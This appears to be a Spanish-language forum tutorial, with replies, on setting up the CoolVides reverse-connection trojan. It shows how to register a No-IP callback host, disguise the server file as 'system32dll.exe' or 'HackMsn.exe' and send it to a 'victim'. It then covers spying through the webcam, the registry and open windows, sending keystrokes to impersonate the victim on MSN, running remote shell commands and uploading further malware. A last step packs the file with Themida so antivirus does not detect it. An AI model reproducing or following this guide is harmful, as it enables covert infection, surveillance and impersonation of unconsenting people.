Bueno, voi hacer este manual de como configurar un troyano de conesion inversa para la gente ke quiera aprender...y todo eso ( no se mucho pero algo se) ya que sepoco, me gustaria compartirlo con los demas Weno, Para ello vamos a usar el troyano llamado CoolVides 0.4,el No-ip, y el Themilla Bueno procedamos El manual esta dividido en varios Pasos . +[[ 1º Paso (Link de descargas) ]] : Nos bajamos los siguientes programas: -Themilla http://rapidshare.com/files/34845515/Themida.1.8.5.5.Full.zip -CoolVides 0.4 (El troyano) http://rapidshare.com/files/34846108/CoolVides_0.4.zip -No-Ip http://rapidshare.com/files/34846432/ducsetup.rar Bueno una vez descargado estos archivos , enpezaremos a configurar todo +[[ 2º Paso (Regristarnos) ]] : - Entramos en www.no-ip.com . Una vez dentro Buscas...Sing up NOW!!, Rellenas los datos, le das a accept .Cuando termines revisa tu correo y el correo no deseado tambien por si acaso. Te enviaran un link para activar tu cuenta , una vez astivada tu cuenta nos vamos de nuevo a... www.no-ip.com nos logeamos Le damos a Add en el menu Host/Redirects.Como se ve en la foto http://img73.*************/img73/4695/manual1cg7.th.png Una vez dentro hacemos lo que dice en la siguiente foto : http://img507.*************/img507/8062/manual2ax5.th.png Luego, cuando termineis de rellenar esos datos, mas abajo te dice Create Host, pulsas ai Luego te saldra otra ventana diciendo Add a host The host elnombre.no-ip.biz se a creado noseke....eso significa que ya se a creado Una vez echo esto..vamos a instalar el No-ip . Aqui os pongo de nuevo el Link de descarga http://rapidshare.com/files/34846432/ducsetup.rar Lo instalais...y cuando termineis os pedira el E-mail Adress cn el que te registraste en no-ip y la contaseña, una vez echo esto te saldra una cosa asi... http://img70.*************/img70/3484/manual3bs7.th.png Bien, una vez echo todo esto , el paso 2 esta echo . +[[ 3º Paso (Configurarlo) ]] : **Antes ke nada desastiva el antivirus** -Es ora de empezar a configurar el troyano,aora teneis que bajaros esto : http://rapidshare.com/files/34846108/CoolVides_0.4.zip Eso es el troyano, lo extraemos en Mis Documentos o en el escritorio ( yo lo hice en mis documentos ) Ahora, te metes en la carpeta llamada CoolVides 0.4 .Vamos a Cliente http://img127.*************/img127/8949/manual4pe6.th.png Y entramos en CoolVides y te aparecera esto.... http://img112.*************/img112/3984/manual5du5.th.png Luego de hacer un click en Configurar servidor, te saldra esto http://img398.*************/img398/9073/manual6bk6.th.png Bueno os explicare cada cosa... Ruta: En la ruta teneis que buscar la carpeta dentro de la otra carpeta llamada CoolVides 0.4 , ¿os acordais deque avia una carpeta llamada Cliente y otra server? Pues teneis que buscar la carpeta llamada Server y pinchar en coolserver ( que es el troyano) si no lo entendeis muy bien...decidlo IP/DNS : Weno aqui teneis que poner la direcion del no-ip...la de...ElNombreQueAyasElegido.no-ip.biz la que elegiste Puerto : Poneis 80 Intentar conectar cada ** Segundos : Dejais 10 Segundos Nombre : Poned Victima o Victima1 XD enverdad eso da igual el nombre que le pongas Aora viene Copiar archivo teneis que marcar esa pestañita y cambiarle el nombre de Coolvi.exe , borrais ese y poneis el siguiente : "system32dll.exe" Sin las comillas Cuando termineis de cambiarle el nombre y ponerle ese, kitais de nuevo la V de lo de Copiar archivo Y luego az click en icono..os saldra esto http://img73.*************/img73/1155/manual7kv9.th.png Haceis click en donde pone FileManageIcons, si no os sale 3 carpetas y una se llama asi, pues buscas la carpeta llamada Cliente dentro de la otra carpeta llamada CoolVides0.4 lo entendeis?xD Bueno una vez dentro ai te saldran unos..25 iconos, eso es la imagen que tendra el troyano, podeis elegir la que kerais, se puede cambiar luego Bueno, haceis click en Guardar Una vez echo esto os vais a la carpeta Server y el coolserver.exe sera el virus, le podeis cambiar el nombre para que no destaque tanto ejemplo...HackMsn.exe Luego en el Troyano haceis CLICK DERECHO y le das a "Añadir al archivo..." y selecionais ZIP y luego click en aceptar Entonces ya tienes el troyano echo, cuando se lo envies a alguien te vas a Clientes y abres el CoolVides y le das a Opciones. Y teneis que tenerlo como esta en la foto siguiente... http://img161.*************/img161/5286/manual8vy2.th.png Luego le dais al botoncito "Guardar" . Entonces, deves de esperar a que la persona ala que se lo as enviado lo aya ejecutado, cuando lo aya ejecutado te saldra un mensajito como el del MsN cuando te abla alguien, encima del reloj, Diciendote CoolVides Alert y te dira unos numeritos y te dira Victima ( o el nombre que le pusiste tu ) Si te sale eso, significa que la victima a sido infectada Entonces vamos a cliente, abrimos Coolvider.exe y te saldra una ip o unos numeritos, le haces doble click y te saldra un menu con varias opciones Lo siento, de esto no pude poner foto yaque no me dejaba..una cosa rara :S Bueno te sale un menu cn varias opciones..Nos vamos a Explorador de Archivos...Clickeamos en Ver unidades, y al lado ai una flechita azul la pulsamos y te saldran varias opciones y su tamaño en Gb te sale A: C: y D: , por ejemplo..señalamos C: y por ejemplo abajos pones C:\Archivos de programa\ y si sabes de batch, o algo puedes señalar algun archivo, click derecho y Subir Archivo, y meterle un virus atraves de Batch, o otras cosas Bueno aora nos vamos a la pestaña Transferencias y en esta pestañita te dice los archivos enviados y/o descargados a la PC remota, y si an sido pasado o no y aora volvemos a la pestaña "Explorador de archivos" y hacemos click en...Ir/Actualizar y te dira el virus que le enviaste..si lo ves, click derecho y ejecutar/abrir normal y ala, el PC remoto infectado XD Bueno, una opcion tambien interesante es la opcion de Webcam , que puedes echarle fotos a la persona remota xDD Otra opcion es la de Mensajes, le puedes mandar mensajes de Error a la persona, los puedes configurar tu y poner lo que quieras En la opcion de regristo podemos ver el registro de qindows de la computadora remota... podemos modificat las claves..agregar y borrar etc xD pones la ruta y le das a Ver En la seccion de bromas, ai 4 bromas diferentes.. pulsas la que kieres y le das a enviar XD Aora te puedes ir a la opcion de Ventanas, y veras lo que tiene abierto la pc remota, te digo que lo mires muy bien, ya que es muy interesante XD Si tiene una ventana del msn abierta le puedes enviar teclas...le haces click derecho y le das a Enviar teclas muy weno para hacerte pasar por el aora nos bamos a la pestaña Procesos, que es los ejecutable que tiene el pc remoto abierto como el Control + Alt + Supr XD puedes..buscar MSNMSGR.EXE , es el msn click derecho y cerrar y ala bb msn Una opcion tambien muy interesante es el Shall, mas o menos sabreis loque es pero esto es ...un MS-DOS digamos, puedes poner los tipicos codigos que hace ke le joda la PC a la gente ..como si fuera un .bat para ejecutarlo, le dais a click derecho en la pantallita gris, y le dais a ejecutar Bueno...Esto es todo del paso numero 3 el mas jodido y largo, aora pasare a hacer INDETECTABLE el troyano +[[ 4º Paso y el ultimo POR FIN (Hacedlo INDETECTABLE!!) ]] : - Bueno... aora toka usar el Themilla , os dejo de nuevo el link de descarga.. http://rapidshare.com/files/34845515/Themida.1.8.5.5.Full.zip Empezamos... Lo extraemos, y dentro ai un archivo llamado Themilla Abrimos el Themida nos saldra esta pantalla : http://img184.*************/img184/8660/themillakk4.th.jpg Aora explicare como encriptar el troyano...para que sea indetectable 1ª-Application Information: Vamos a Input Filename buscamos el server osea, el troyano en la carpeta server,y yasta, pasamos a lo siguiente Protection Options: Lo dejamos como esta seleccionado por defecto. Code Replace: Aqui no tokamos nada. Virtual Machine: Aqui lo dejamos asi , como dice en la foto http://img115.*************/img115/4734/themilla2iw6.th.jpg Customized Dialogs: No tocamos nada. Advanced Options: Aqui cambiamos el nombre donde pone Themida por el system sino cambian eso el server sera mas detectable ante los av.Lo dejamos asi solo marcamos Encript Apliction. http://img57.*************/img57/8620/themilla3vn0.th.jpg Bueno, echo esto le damos arriba, a un candadito que dice...Protect, nos saldra dos botoncitos como esta en la foto http://img124.*************/img124/1089/themilla4et8.th.jpg que dice uno de ello Close y otro Protect, le damos a Protect Una vez que se alla cargado todo te saldra Test Protect File y Close, NI SE OS OCURRA PULSAR TEST PROTECT FILE O OS INFECTAREIS VOSOTROS, asi que le damos a close Bueno dicho esto, Felicidades, As terminado tu troyano Indetectable !!! Gracias por leer este Manual muchas gracias Echo Por *Tebi* PORFAVOR SI ENCONTRAIS ALGUN ERROR, O SE ME OLVIDO ALGO PORFAVOR DECIDMELO PD: Soi Tebi
Gracias, me lo curre mucho ya lo ire posteando en otras webs Espero ke os sirva, si tene algun error postearlo plsss thx
es la primera vez que veo un tutorial de esta categoria quede admirado de lo simple que es webiar a alguien se agradece el aporte y me haz enseñado que realmente cualquier weon puede creerse hacker ja! gracias
Hola.. Me a surgido un problema con el Coolvibes.. cuando termino de configuirar pongo el icono y todo pero cuando pongo guardar me dice esto: > Escribiendo la configuración en el servidor... > No se pudo guardar la configuración. > Cambiando el icono al servidor... > No se pudo cambiar el ícono. Nose cual es el problema.. me podrian ayudar! Desde ya gracias!
